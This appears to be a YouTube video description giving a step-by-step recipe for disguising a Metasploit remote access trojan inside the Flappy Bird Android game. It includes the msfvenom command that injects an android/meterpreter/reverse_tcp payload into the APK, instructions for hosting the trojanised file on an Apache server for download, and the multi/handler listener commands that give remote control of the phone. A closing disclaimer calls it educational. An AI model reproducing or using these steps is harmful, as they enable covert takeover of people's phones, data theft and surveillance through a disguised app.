Android Phone access with Metasploit Framework, inject payload to known app
Cyber Security Expert
In this video I try to describe how Metasploit payload created and injected into a well known game app and install it android devices for Remote Access Trojan ( RAT). This payload can make a backdoor for accessing the phone remotely.
#metasploit , #androidhacking, #android
π All necessary command given bellow : Download flappy bird apk from softnic.com. Then inject exploits to flappybird.apk, flow the instruction.
π Prerequisite: $sudo apt install apktool $sudo apt install apksigner $sudo apt install zipalign $sudo apt install default-jdk
π This command inject payload to flappybird $ sudo msfvenom -x flappy_bird-v1-3.apk --platform android -p android/meterpreter/reverse_tcp LHOST=192.168.1.146 LPORT=4444 -o flappy_bird-virus.apk Replace IP address to your PCs IP
π Start apache server $ Sudo service apache2 start copy flappy_bird-virus.apk to /var/www/html/ make a index.html file and insert html code for download "flappy_bird-virus.apk " file. Sorry YouTube does not allow me to put html code here. Please look the video for this html code.
π Start Metasploit $sudo msfconsole msf6: use exploit/multi/handler msf6: exploit(multi/handler): set payload android/meterpreter/reverse_tcp msf6: exploit(multi/handler): set LHOST 192.168.1.146 msf6: exploit(multi/handler): set LPORT 4444 msf6: exploit(multi/handler): show options msf6: exploit(multi/handler): run meterpreter:
πIn your mobile browser put this IP address 192.168.1.146 and download the file and install it as shown in video show command with help and do R&D. . meterpreter: help
If you face any difficulties please leave a comments here. I will try to solve it inshallah. You are also welcome to request me for making cyber security related any video. You may give likes or share this video if you think it will be help to others. Thank you for watching. Mizan
β οΈ Disclaimer: Hacking without permission is illegal. This channel is strictly educational for learning about cyber-security in the areas of ethical hacking and penetration testing so that we can protect ourselves against the real hackers.
92953070 Bytes